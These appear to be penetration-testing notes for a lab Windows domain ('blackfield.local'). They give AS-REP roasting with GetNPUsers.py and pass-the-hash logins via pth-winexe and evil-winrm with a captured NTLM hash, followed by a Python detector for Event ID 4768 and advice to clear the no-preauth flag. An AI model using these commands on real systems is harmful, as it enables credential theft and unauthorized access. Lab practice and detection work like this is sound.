04 Windows Enum & Exploit

ExploitDB

searchsploit -m 48431

User Enum

When you have a list of possible users, use GetNPUsers.py to get the correct user list with the NTLM hash. After that, use "pth-winexe" or "evil-winrm" with the NTLM hash to log in to the Windows system.
python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john

# Method 1
pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd

# Method 2 (evil-winrm: -u is the user, -H takes only the NT half of the hash)
evil-winrm -u svc_backup -H b624dc83a27cc29da11d9bf25efea796 -i 10.10.10.192
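
The GetNPUsers.py step above as a domain controller logs it, in an added example that is not part of the original notes: it scans constructed Security-log Event ID 4768 records for TGTs issued without pre-authentication and for bursts of unknown-principal failures from the same source. The field names follow the 4768 event; the sample accounts, the addresses and the threshold of 3 are assumptions.

```python
from collections import defaultdict

# Constructed sample of Security-log Event ID 4768 records (Kerberos TGT
# requests) as a DC would log them; every account and address is made up.
def _ev(user, ip, status, preauth, etype):
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}

SAMPLE_EVENTS = [
    _ev("alice", "::ffff:192.0.2.10", "0x0", "2", "0x12"),         # normal logon
    _ev("ghost1", "::ffff:192.0.2.66", "0x6", "-", "0xFFFFFFFF"),  # unknown name
    _ev("ghost2", "::ffff:192.0.2.66", "0x6", "-", "0xFFFFFFFF"),
    _ev("ghost3", "::ffff:192.0.2.66", "0x6", "-", "0xFFFFFFFF"),
    _ev("svc_legacy", "::ffff:192.0.2.66", "0x0", "0", "0x17"),    # no pre-auth, RC4
    _ev("kiosk", "::ffff:192.0.2.20", "0x0", "0", "0x12"),         # no pre-auth, AES
]

UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN
NO_PREAUTH = "0"           # TGT issued without Kerberos pre-authentication
RC4_HMAC = "0x17"          # RC4-HMAC ticket encryption type

def find_asrep_roasting(events, unknown_threshold=3):
    """Report no-pre-auth TGTs per source, raised to 'high' when the same
    source also guessed usernames or asked for an RC4-encrypted reply."""
    per_source = defaultdict(lambda: {"no_preauth": [], "unknown": set()})
    for ev in events:
        src = ev["IpAddress"].replace("::ffff:", "")
        status = ev["Status"].lower()
        if status == UNKNOWN_PRINCIPAL:
            per_source[src]["unknown"].add(ev["TargetUserName"])
        elif status == "0x0" and ev["PreAuthType"] == NO_PREAUTH:
            rc4 = ev["TicketEncryptionType"].lower() == RC4_HMAC
            per_source[src]["no_preauth"].append((ev["TargetUserName"], rc4))
    findings = []
    for src, seen in per_source.items():
        guessing = len(seen["unknown"]) >= unknown_threshold
        for user, rc4 in seen["no_preauth"]:
            findings.append({"source": src, "account": user, "rc4": rc4,
                             "user_list_guessing": guessing,
                             "severity": "high" if (guessing or rc4) else "review"})
    return findings

if __name__ == "__main__":
    for finding in find_asrep_roasting(SAMPLE_EVENTS):
        print(finding)
```

Every account it reports has "Do not require Kerberos preauthentication" set; clearing that flag is what stops the request from returning crackable material.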